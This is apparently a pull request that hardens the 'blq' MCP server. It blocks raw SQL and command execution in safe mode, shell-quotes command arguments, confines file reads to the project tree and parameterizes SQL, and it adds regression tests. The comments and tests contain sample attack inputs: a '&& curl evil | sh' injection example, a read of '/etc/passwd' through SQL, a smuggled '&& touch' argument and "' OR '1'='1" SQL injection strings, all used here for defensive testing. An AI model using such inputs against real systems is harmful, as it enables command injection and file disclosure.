### PR TITLE
Contain MCP safe mode; parameterize query builders; confine source-context

### DIFF
--- a/src/blq/commands/core.py
+++ b/src/blq/commands/core.py
@@ -11,6 +11,7 @@ import json
 import logging
 import os
 import re
+import shlex
 import shutil
 import subprocess
 import sys
@@ -1320,15 +1321,21 @@ def expand_command(
                 raise ValueError(f"Missing required argument '{placeholder.name}'")
 
     # Substitute placeholders in template
+    # The expanded string is run with shell=True, so every value that comes from
+    # a caller (placeholder values and passthrough/extra args) is shell-quoted to
+    # prevent injection (e.g. `&& curl evil | sh`). The template itself is trusted
+    # (defined at registration) and is left intact so it may carry intentional
+    # shell syntax. Note: a placeholder value is now a single shell token — a
+    # value like "-k foo" no longer splits into two arguments.
     result = template
     for match in _PLACEHOLDER_PATTERN.finditer(template):
         name = match.group(1)
-        result = result.replace(match.group(0), values[name], 1)
+        result = result.replace(match.group(0), shlex.quote(values[name]), 1)
 
-    # Append extra args
+    # Append extra args (each quoted so passthrough args stay literal argv tokens)
     all_extra = remaining_positional + (extra_args or [])
     if all_extra:
-        result = result + " " + " ".join(all_extra)
+        result = result + " " + " ".join(shlex.quote(arg) for arg in all_extra)
 
     return result
 

--- a/src/blq/output.py
+++ b/src/blq/output.py
@@ -841,6 +841,33 @@ def print_output(
     print(output, file=file)
 
 
+def resolve_under_root(root: Any, ref_file: Any) -> Any:
+    """Resolve ``ref_file`` against ``root``, refusing anything that escapes it.
+
+    ``ref_file`` is populated from parsed compiler/test output and is therefore
+    untrusted. A crafted absolute path or a ``..`` traversal must not be able to
+    read files outside the project tree. Absolute paths that legitimately live
+    *inside* ``root`` (compilers often emit absolute paths) are still allowed.
+
+    Returns the resolved ``Path`` if it lies within ``root``, otherwise ``None``.
+    """
+    from pathlib import Path
+
+    try:
+        root_resolved = Path(root).resolve()
+        candidate = Path(ref_file)
+        if candidate.is_absolute():
+            resolved = candidate.resolve()
+        else:
+            resolved = (root_resolved / candidate).resolve()
+    except (OSError, ValueError, RuntimeError):
+        return None
+
+    if resolved == root_resolved or resolved.is_relative_to(root_resolved):
+        return resolved
+    return None
+
+
 def read_source_context(
     ref_file: str,
     ref_line: int,
@@ -850,13 +877,14 @@ def read_source_context(
     """Read source file and return formatted context lines around ref_line.
 
     Args:
-        ref_file: Path to source file (relative or absolute)
+        ref_file: Path to source file (relative to ref_root; must not escape it)
         ref_line: 1-indexed line number of interest
         ref_root: Root path for resolving relative paths (default: current dir)
         context: Number of context lines before/after
 
     Returns:
-        Formatted context string with line numbers and markers, or None if file not found
+        Formatted context string with line numbers and markers, or None if file
+        not found or if it would resolve outside ref_root.
     """
     from pathlib import Path
 
@@ -865,15 +893,11 @@ def read_source_context(
     else:
         ref_root = Path(ref_root)
 
-    # Try to resolve the file path
-    file_path = ref_root / ref_file
-    if not file_path.exists():
-        # Try absolute path
-        abs_path = Path(ref_file)
-        if abs_path.exists():
-            file_path = abs_path
-        else:
-            return None
+    # Resolve strictly under ref_root: an absolute or ``..`` ref_file that
+    # escapes the root is refused (arbitrary off-tree file read).
+    file_path = resolve_under_root(ref_root, ref_file)
+    if file_path is None or not file_path.exists():
+        return None
 
     try:
         content = file_path.read_text(errors="replace")

--- a/src/blq/serve.py
+++ b/src/blq/serve.py
@@ -60,6 +60,8 @@ from blq.storage import BlqStorage
 # These are the tools disabled when running in safe mode
 SAFE_MODE_DISABLED_TOOLS = {
     "exec",  # Can run arbitrary commands
+    "run",  # Executes registered commands; forwards caller args into a shell
+    "query",  # Raw SQL against DuckDB (read_text/COPY reach the filesystem)
     "clean",  # Can delete data
     "register_command",  # Can modify command registry
     "unregister_command",  # Can modify command registry
@@ -1035,13 +1037,18 @@ def _event_impl(ref: str) -> dict[str, Any] | None:
         tag, run_serial, event_id = _parse_ref(ref)
         store = _get_storage()
 
-        # Build query using run_serial and event_id
+        # Build query using run_serial and event_id (parameterized: tag is
+        # caller-influenced and must not be interpolated into SQL)
         if tag is not None:
-            where = f"tag = '{tag}' AND run_serial = {run_serial} AND event_id = {event_id}"
+            where = "tag = ? AND run_serial = ? AND event_id = ?"
+            params: list[Any] = [tag, run_serial, event_id]
         else:
-            where = f"run_serial = {run_serial} AND event_id = {event_id}"
+            where = "run_serial = ? AND event_id = ?"
+            params = [run_serial, event_id]
 
-        result = store.sql(f"SELECT * FROM blq_load_events() WHERE {where}").fetchone()
+        result = store.sql(
+            f"SELECT * FROM blq_load_events() WHERE {where}", params
+        ).fetchone()
 
         if result is None:
             return None
@@ -1109,13 +1116,18 @@ def _context_impl(ref: str, lines: int = 5) -> dict[str, Any]:
         tag, run_serial, event_id = _parse_ref(ref)
         storage = _get_storage()
 
-        # Build query using run_serial and event_id
+        # Build query using run_serial and event_id (parameterized: tag is
+        # caller-influenced and must not be interpolated into SQL)
         if tag is not None:
-            where = f"tag = '{tag}' AND run_serial = {run_serial} AND event_id = {event_id}"
+            where = "tag = ? AND run_serial = ? AND event_id = ?"
+            params: list[Any] = [tag, run_serial, event_id]
         else:
-            where = f"run_serial = {run_serial} AND event_id = {event_id}"
+            where = "run_serial = ? AND event_id = ?"
+            params = [run_serial, event_id]
 
-        result = storage.sql(f"SELECT * FROM blq_load_events() WHERE {where}").fetchone()
+        result = storage.sql(
+            f"SELECT * FROM blq_load_events() WHERE {where}", params
+        ).fetchone()
 
         if result is None:
             return {"error": f"Event {ref} not found"}
@@ -1193,13 +1205,18 @@ def _inspect_impl(
         tag, run_serial, event_id = _parse_ref(ref)
         storage = _get_storage()
 
-        # Build query using run_serial and event_id
+        # Build query using run_serial and event_id (parameterized: tag is
+        # caller-influenced and must not be interpolated into SQL)
         if tag is not None:
-            where = f"tag = '{tag}' AND run_serial = {run_serial} AND event_id = {event_id}"
+            where = "tag = ? AND run_serial = ? AND event_id = ?"
+            params: list[Any] = [tag, run_serial, event_id]
         else:
-            where = f"run_serial = {run_serial} AND event_id = {event_id}"
+            where = "run_serial = ? AND event_id = ?"
+            params = [run_serial, event_id]
 
-        result = storage.sql(f"SELECT * FROM blq_load_events() WHERE {where}").fetchone()
+        result = storage.sql(
+            f"SELECT * FROM blq_load_events() WHERE {where}", params
+        ).fetchone()
 
         if result is None:
             return {"error": f"Event {ref} not found"}
@@ -2292,6 +2309,7 @@ def run(
         When lines is active (explicit or from command config), includes 'output' key.
         In batch mode, returns results for each command with overall status.
     """
+    _check_tool_enabled("run")
     # Batch mode: run multiple commands in sequence
     if commands is not None:
         results = []
@@ -2392,6 +2410,7 @@ def query(
         query(filter="severity=error,warning ref_file~test")
         query(filter="tool_name=pytest", limit=50)
     """
+    _check_tool_enabled("query")
     return _query_impl(sql=sql, filter=filter, limit=limit)
 
 

--- a/src/blq/serve.py
+++ b/src/blq/serve.py
@@ -1046,9 +1046,7 @@ def _event_impl(ref: str) -> dict[str, Any] | None:
             where = "run_serial = ? AND event_id = ?"
             params = [run_serial, event_id]
 
-        result = store.sql(
-            f"SELECT * FROM blq_load_events() WHERE {where}", params
-        ).fetchone()
+        result = store.sql(f"SELECT * FROM blq_load_events() WHERE {where}", params).fetchone()
 
         if result is None:
             return None
@@ -1125,9 +1123,7 @@ def _context_impl(ref: str, lines: int = 5) -> dict[str, Any]:
             where = "run_serial = ? AND event_id = ?"
             params = [run_serial, event_id]
 
-        result = storage.sql(
-            f"SELECT * FROM blq_load_events() WHERE {where}", params
-        ).fetchone()
+        result = storage.sql(f"SELECT * FROM blq_load_events() WHERE {where}", params).fetchone()
 
         if result is None:
             return {"error": f"Event {ref} not found"}
@@ -1214,9 +1210,7 @@ def _inspect_impl(
             where = "run_serial = ? AND event_id = ?"
             params = [run_serial, event_id]
 
-        result = storage.sql(
-            f"SELECT * FROM blq_load_events() WHERE {where}", params
-        ).fetchone()
+        result = storage.sql(f"SELECT * FROM blq_load_events() WHERE {where}", params).fetchone()
 
         if result is None:
             return {"error": f"Event {ref} not found"}

--- a/src/blq/services/inspect.py
+++ b/src/blq/services/inspect.py
@@ -117,9 +117,12 @@ def get_git_context(
 
     try:
         import blq.git as git_mod
+        import blq.output as output_mod
 
-        file_path = source_root / ref_file
-        if not file_path.exists():
+        # Confine to source_root: ref_file is untrusted (parsed from log output),
+        # so an absolute or ``..`` path that escapes the tree is refused.
+        file_path = output_mod.resolve_under_root(source_root, ref_file)
+        if file_path is None or not file_path.exists():
             return None
 
         ctx = git_mod.get_file_context(str(file_path), line=ref_line, history_limit=history_limit)

--- a/src/blq/services/query.py
+++ b/src/blq/services/query.py
@@ -269,37 +269,46 @@ def query_events(
         conn = storage.connection
 
         where_parts: list[str] = []
+        params: list[Any] = []
 
-        # Severity filter (supports comma-separated)
+        # Severity filter (supports comma-separated). Parameterized so a
+        # caller-supplied value cannot alter the query.
         if severity is not None:
-            if "," in severity:
-                severities = [s.strip() for s in severity.split(",")]
-                placeholders = ", ".join(f"'{s}'" for s in severities)
-                where_parts.append(f"severity IN ({placeholders})")
-            else:
-                where_parts.append(f"severity = '{severity}'")
+            severities = (
+                [s.strip() for s in severity.split(",")] if "," in severity else [severity]
+            )
+            placeholders = ", ".join("?" for _ in severities)
+            where_parts.append(f"severity IN ({placeholders})")
+            params.extend(severities)
 
         if run_id is not None:
-            where_parts.append(f"run_serial = {int(run_id)}")
+            where_parts.append("run_serial = ?")
+            params.append(int(run_id))
         elif source:
-            where_parts.append(f"source_name = '{source}'")
+            where_parts.append("source_name = ?")
+            params.append(source)
         elif default_to_latest and not all_runs:
             last_run = conn.execute("SELECT MAX(run_serial) FROM blq_load_events()").fetchone()
             if last_run and last_run[0]:
-                where_parts.append(f"run_serial = {last_run[0]}")
+                where_parts.append("run_serial = ?")
+                params.append(int(last_run[0]))
 
         if file_pattern is not None:
-            where_parts.append(f"ref_file LIKE '{file_pattern}'")
+            where_parts.append("ref_file LIKE ?")
+            params.append(file_pattern)
 
         # Suppression filter
         if suppressed_fingerprints:
-            fp_list = ", ".join(f"'{fp}'" for fp in suppressed_fingerprints)
-            where_parts.append(f"(fingerprint IS NULL OR fingerprint NOT IN ({fp_list}))")
+            fp_placeholders = ", ".join("?" for _ in suppressed_fingerprints)
+            where_parts.append(
+                f"(fingerprint IS NULL OR fingerprint NOT IN ({fp_placeholders}))"
+            )
+            params.extend(suppressed_fingerprints)
 
         where_clause = ("WHERE " + " AND ".join(where_parts)) if where_parts else ""
 
         count_sql = f"SELECT COUNT(*) FROM blq_load_events() {where_clause}"
-        total_count_result = conn.execute(count_sql).fetchone()
+        total_count_result = conn.execute(count_sql, params).fetchone()
         total_count: int = int(total_count_result[0]) if total_count_result else 0
 
         events_sql = f"""
@@ -309,7 +318,7 @@ def query_events(
             ORDER BY run_serial DESC, event_id
             LIMIT {int(limit)}
         """
-        result = conn.execute(events_sql)
+        result = conn.execute(events_sql, params)
         columns = [d[0] for d in result.description]
         rows = result.fetchall()
 

--- a/src/blq/services/query.py
+++ b/src/blq/services/query.py
@@ -274,9 +274,7 @@ def query_events(
         # Severity filter (supports comma-separated). Parameterized so a
         # caller-supplied value cannot alter the query.
         if severity is not None:
-            severities = (
-                [s.strip() for s in severity.split(",")] if "," in severity else [severity]
-            )
+            severities = [s.strip() for s in severity.split(",")] if "," in severity else [severity]
             placeholders = ", ".join("?" for _ in severities)
             where_parts.append(f"severity IN ({placeholders})")
             params.extend(severities)
@@ -300,9 +298,7 @@ def query_events(
         # Suppression filter
         if suppressed_fingerprints:
             fp_placeholders = ", ".join("?" for _ in suppressed_fingerprints)
-            where_parts.append(
-                f"(fingerprint IS NULL OR fingerprint NOT IN ({fp_placeholders}))"
-            )
+            where_parts.append(f"(fingerprint IS NULL OR fingerprint NOT IN ({fp_placeholders}))")
             params.extend(suppressed_fingerprints)
 
         where_clause = ("WHERE " + " AND ".join(where_parts)) if where_parts else ""

--- a/tests/test_security_containment.py
+++ b/tests/test_security_containment.py
@@ -1,0 +1,247 @@
+"""Security regression tests: MCP safe-mode containment, path confinement, SQLi.
+
+These are adversarial tests for the fixes tracked in GHSA-2g6f-xm6v-cwf5 / issue #45:
+
+1. Safe mode must *contain* an untrusted caller: the ``run`` and ``query`` tools
+   (raw SQL + command execution) must be refused when safe mode is on.
+2. Source-context resolution must stay confined under ``source_root`` -- an
+   absolute or ``..`` ``ref_file`` (which is populated from parsed log content)
+   must not read files off-tree.
+3. The query builders (serve.py tag clauses + services/query.py) must be
+   parameterized so a value containing a quote / boolean-injection cannot alter
+   results.
+
+All fixtures are local temp files; nothing here touches the network.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from blq import serve
+
+# ---------------------------------------------------------------------------
+# Fixtures
+# ---------------------------------------------------------------------------
+
+
+@pytest.fixture
+def blq_with_data(initialized_project, sample_build_script):
+    """An initialized project with a run's worth of parsed events.
+
+    Mirrors the ``mcp_server`` fixture in test_mcp_server.py but returns nothing
+    special -- tests use ``_get_storage()`` against the current cwd.
+    """
+    import subprocess
+    import sys
+
+    subprocess.run(
+        [sys.executable, "-m", "blq", "exec", "--quiet", str(sample_build_script)],
+        capture_output=True,
+    )
+    return initialized_project
+
+
+@pytest.fixture
+def safe_mode():
+    """Enable MCP safe mode for the duration of a test, then restore.
+
+    ``serve._disabled_tools`` is module-global state; leaking it would poison
+    later tests that call query/run, so we reset it in teardown.
+    """
+    saved = serve._disabled_tools
+    serve._disabled_tools = None
+    serve._init_disabled_tools(safe_mode=True)
+    try:
+        yield
+    finally:
+        serve._disabled_tools = saved
+
+
+# ---------------------------------------------------------------------------
+# 1. Safe-mode containment
+# ---------------------------------------------------------------------------
+
+
+class TestSafeModeContainment:
+    """Safe mode must refuse the raw-SQL and command-execution tools."""
+
+    def test_query_is_disabled_in_safe_mode(self, safe_mode):
+        """A safe-mode caller cannot run raw SQL (which could read_text/COPY).
+
+        The canary here is conceptual: on base ``query`` has no gate, so a
+        ``read_text('/etc/passwd')`` would execute. We assert the tool itself
+        is refused (PermissionError) -- containment, not a per-payload block.
+        """
+        with pytest.raises(PermissionError):
+            serve.query(sql="SELECT read_text('/etc/passwd')")
+
+    def test_run_is_disabled_in_safe_mode(self, safe_mode, tmp_path):
+        """A safe-mode caller cannot execute a registered command.
+
+        On base ``run`` forwards caller args into a shell; we assert the tool is
+        refused before any subprocess is spawned (the marker file must not appear).
+        """
+        marker = tmp_path / "run_marker"
+        assert not marker.exists()
+        with pytest.raises(PermissionError):
+            serve.run(command="anything", extra=["&&", f"touch {marker}"])
+        assert not marker.exists(), "safe-mode run executed despite being disabled"
+
+    def test_safe_mode_disables_run_and_query(self, safe_mode):
+        """The disabled set explicitly includes the new tools."""
+        disabled = serve._load_disabled_tools()
+        assert "run" in disabled
+        assert "query" in disabled
+        # Existing containment preserved.
+        assert "exec" in disabled
+        assert "clean" in disabled
+
+    def test_query_still_works_without_safe_mode(self):
+        """Sanity: query is NOT gated when safe mode is off."""
+        saved = serve._disabled_tools
+        serve._disabled_tools = None
+        serve._init_disabled_tools(safe_mode=False)
+        try:
+            # Should not raise PermissionError (may return an error dict if no
+            # repo, but that is a different, non-security failure mode).
+            result = serve.query(sql="SELECT 1 AS x")
+            assert isinstance(result, dict)
+        finally:
+            serve._disabled_tools = saved
+
+
+# ---------------------------------------------------------------------------
+# 2. Source-context path confinement
+# ---------------------------------------------------------------------------
+
+
+class TestSourceContextConfinement:
+    """read_source_context / get_source_context must not escape source_root."""
+
+    def _make_canary(self, tmp_path):
+        root = tmp_path / "project"
+        root.mkdir()
+        (root / "in_tree.py").write_text("print('inside')\n")
+        secret_dir = tmp_path / "outside"
+        secret_dir.mkdir()
+        canary = secret_dir / "canary.txt"
+        canary.write_text("CANARY_SECRET_TOKEN\n")
+        return root, canary
+
+    def test_absolute_ref_file_is_refused(self, tmp_path):
+        """An absolute ref_file must not be read (pathlib discards the root)."""
+        import blq.output as output_mod
+
+        root, canary = self._make_canary(tmp_path)
+        # Path(root) / "/abs/canary" == Path("/abs/canary") -- root is discarded.
+        result = output_mod.read_source_context(
+            str(canary), 1, ref_root=str(root), context=2
+        )
+        assert result is None or "CANARY_SECRET_TOKEN" not in result
+
+    def test_dotdot_ref_file_is_refused(self, tmp_path):
+        """A ../ traversal out of source_root must not be read."""
+        import blq.output as output_mod
+
+        root, canary = self._make_canary(tmp_path)
+        rel = f"../outside/{canary.name}"
+        result = output_mod.read_source_context(rel, 1, ref_root=str(root), context=2)
+        assert result is None or "CANARY_SECRET_TOKEN" not in result
+
+    def test_in_tree_file_still_reads(self, tmp_path):
+        """Legitimate in-tree relative paths still resolve (no over-blocking)."""
+        import blq.output as output_mod
+
+        root, _ = self._make_canary(tmp_path)
+        result = output_mod.read_source_context(
+            "in_tree.py", 1, ref_root=str(root), context=2
+        )
+        assert result is not None
+        assert "inside" in result
+
+    def test_service_get_source_context_confined(self, tmp_path):
+        """The service wrapper (used by inspect) is confined too."""
+        from pathlib import Path
+
+        from blq.services.inspect import get_source_context
+
+        root, canary = self._make_canary(tmp_path)
+        result = get_source_context(
+            ref_file=str(canary),
+            ref_line=1,
+            source_root=Path(root),
+            context_lines=2,
+        )
+        assert result is None or "CANARY_SECRET_TOKEN" not in result
+
+    def test_git_context_absolute_ref_file_confined(self, tmp_path):
+        """get_git_context must not run git ops on an off-root absolute path."""
+        from pathlib import Path
+
+        from blq.services.inspect import get_git_context
+
+        root, canary = self._make_canary(tmp_path)
+        result = get_git_context(
+            ref_file=str(canary),
+            ref_line=1,
+            source_root=Path(root),
+        )
+        assert result is None
+
+
+# ---------------------------------------------------------------------------
+# 3. SQL injection in the query builders
+# ---------------------------------------------------------------------------
+
+
+class TestQueryBuilderInjection:
+    """Values flowing into query builders must be parameterized."""
+
+    def test_source_filter_injection_does_not_alter_results(self, blq_with_data):
+        """services/query.py: a boolean-injection in `source` must not match all rows."""
+        from blq.serve import _get_storage
+        from blq.services.query import query_events
+
+        storage = _get_storage()
+        baseline = query_events(storage, all_runs=True, limit=100)
+        assert baseline["total_count"] > 0, "fixture should have produced events"
+
+        injected = query_events(
+            storage, source="nope' OR '1'='1", all_runs=True, limit=100
+        )
+        # Parameterized: the literal source matches nothing -> 0 rows.
+        # On the f-string path the OR makes it match every row.
+        assert injected["total_count"] == 0, (
+            "SQL injection via source filter altered results"
+        )
+
+    def test_tag_clause_injection_does_not_bypass_tag(self, blq_with_data):
+        """serve.py tag where-clause: injection must not bypass the tag match."""
+        from blq.serve import _event_impl, _get_storage
+        from blq.services.query import query_events
+
+        storage = _get_storage()
+        events = query_events(storage, all_runs=True, limit=1)["events"]
+        assert events, "fixture should have produced events"
+        ev = events[0]
+        serial = ev["run_serial"]
+        eid = ev["event_id"]
+
+        # A bogus tag combined with a boolean injection: on the f-string path
+        # `tag = 'zzz' OR '1'='1' AND run_serial = S AND event_id = E` matches
+        # the real event regardless of tag. Parameterized, the literal tag
+        # (which no event carries) matches nothing.
+        bogus_ref = f"zzz' OR '1'='1:{serial}:{eid}"
+        result = _event_impl(bogus_ref)
+        assert result is None, "tag-clause SQL injection bypassed the tag filter"
+
+    def test_single_quote_value_does_not_error(self, blq_with_data):
+        """A plain single-quote in a value must be handled cleanly, not crash."""
+        from blq.serve import _get_storage
+        from blq.services.query import query_events
+
+        storage = _get_storage()
+        # Should return a well-formed (empty) result, never raise.
+        result = query_events(storage, source="a'b", all_runs=True, limit=10)
+        assert result["total_count"] == 0

--- a/tests/test_security_containment.py
+++ b/tests/test_security_containment.py
@@ -135,9 +135,7 @@ class TestSourceContextConfinement:
 
         root, canary = self._make_canary(tmp_path)
         # Path(root) / "/abs/canary" == Path("/abs/canary") -- root is discarded.
-        result = output_mod.read_source_context(
-            str(canary), 1, ref_root=str(root), context=2
-        )
+        result = output_mod.read_source_context(str(canary), 1, ref_root=str(root), context=2)
         assert result is None or "CANARY_SECRET_TOKEN" not in result
 
     def test_dotdot_ref_file_is_refused(self, tmp_path):
@@ -154,9 +152,7 @@ class TestSourceContextConfinement:
         import blq.output as output_mod
 
         root, _ = self._make_canary(tmp_path)
-        result = output_mod.read_source_context(
-            "in_tree.py", 1, ref_root=str(root), context=2
-        )
+        result = output_mod.read_source_context("in_tree.py", 1, ref_root=str(root), context=2)
         assert result is not None
         assert "inside" in result
 
@@ -207,14 +203,10 @@ class TestQueryBuilderInjection:
         baseline = query_events(storage, all_runs=True, limit=100)
         assert baseline["total_count"] > 0, "fixture should have produced events"
 
-        injected = query_events(
-            storage, source="nope' OR '1'='1", all_runs=True, limit=100
-        )
+        injected = query_events(storage, source="nope' OR '1'='1", all_runs=True, limit=100)
         # Parameterized: the literal source matches nothing -> 0 rows.
         # On the f-string path the OR makes it match every row.
-        assert injected["total_count"] == 0, (
-            "SQL injection via source filter altered results"
-        )
+        assert injected["total_count"] == 0, "SQL injection via source filter altered results"
 
     def test_tag_clause_injection_does_not_bypass_tag(self, blq_with_data):
         """serve.py tag where-clause: injection must not bypass the tag match."""


### PR DESCRIPTION
## Summary

Hardens the MCP server so that **safe mode actually contains an untrusted caller**, and so a crafted log record cannot cause an off-tree file read. Also parameterizes the remaining f-string query builders and shell-quotes command expansion.

Tracks a private security advisory (**GHSA-2g6f-xm6v-cwf5**, MED) and public tracking issue **#45**. This description covers the *fix and its tests*, not the exploit; the advisory is to be **published at release** (coordinated disclosure).

> Note: per the advisory guidance, this suite was run with the repo's **own pytest**, not the `blq` MCP tool — the MCP server is the surface under test, so dogfooding it to validate its own patch would be circular.

## What changed

1. **Contain safe mode.** `run` and `query` are added to `SAFE_MODE_DISABLED_TOOLS` and both tools now call `_check_tool_enabled(...)` at entry. Previously safe mode disabled only state-mutating tools, leaving raw SQL (`query`) and command execution (`run`) reachable.
   - **Behavior change:** a safe-mode caller keeps `events` / `errors` / `inspect` and structured `filter=` queries, but loses raw SQL and command execution. Internal callers go through the `_impl` helpers and are unaffected (e.g. `exec`'s registered-command fallback calls `_run_impl`, not the gated tool).

2. **Confine source-context to the project tree.** New `output.resolve_under_root()` resolves `ref_file` under `source_root` and refuses anything that escapes it; used by `read_source_context` and `services.inspect.get_git_context`. `ref_file` is parsed from compiler/test output (untrusted), and pathlib silently discards the root when the join operand is absolute — so an absolute or `..` `ref_file` previously read off-host. Absolute paths that genuinely resolve *inside* the root still work (compilers often emit absolute paths).

3. **Parameterize the query builders.** The tag/run/event where-clauses in `serve.py` (`_event_impl` / `_context_impl` / `_inspect_impl`) and the filter builders in `services/query.py` now use `?` placeholders — consistent with the already-parameterized `resolve_run_ref` / `query_history` paths.

4. **Shell-quote command expansion.** `expand_command` now `shlex.quote`s placeholder values and passthrough/extra args before they reach `subprocess.Popen(..., shell=True)`.
   - **Behavior change:** a placeholder value is now a single shell token — a value like `-k foo` no longer splits into two arguments. The command *template* itself is unchanged (it is trusted, defined at registration, and may carry intentional shell syntax).

## Tests (reproduce-first)

Adds `tests/test_security_containment.py` (12 tests). Each security assertion **fails on the prior code and passes here** — captured red→green with the repo's own pytest:

| area | on base (red) | after fix (green) |
|---|---|---|
| safe-mode `query` refused | returns results (no gate) | raises `PermissionError` |
| safe-mode `run` refused (marker file) | executes | raises before any subprocess |
| absolute / `..` `ref_file` | reads the off-tree canary | refused (`None`) |
| `get_git_context` off-root | runs git on off-tree path | refused (`None`) |
| `source` boolean-injection | `OR '1'='1'` matches all rows | literal value → 0 rows |
| tag-clause injection via `inspect` | bypasses the tag filter | literal tag → not found |

Base: **9 failed, 3 passed** (the 3 are the no-over-blocking sanity checks). After fix: **12 passed**. Affected non-security files (`test_command_args`, `test_core`, `test_services_query`, `test_services_inspect`, `test_inspect`, `test_services_execution`, `test_query_api`, `test_query_filter`): **270 passed**. `ruff` clean; `mypy` clean on changed files.

## Residual risk (calibrated)

- **CONFIRMED closed** (with passing repros): safe-mode reachability of `run`/`query`; off-tree read via absolute/`..` `ref_file` in source and git context; SQLi in the serve.py tag clauses and the `services/query.py` filter builders.
- **PLAUSIBLE residual:** `commands/query_cmd.parse_filter_expression` still builds its WHERE fragment with f-strings (it returns a SQL *string*, shared with the CLI). It is only reachable through the now-gated `query` tool (`filter=`), i.e. by a **trusted, non-safe-mode** caller at the same trust level as raw `sql=`. Parameterizing it changes a return-type contract used in several places and is left as a scoped follow-up rather than folded into this security fix.
- Path confinement follows symlinks via `Path.resolve()`, so an in-tree symlink pointing outside the root is refused — intentional, but stricter than plain string containment.

Closes #45.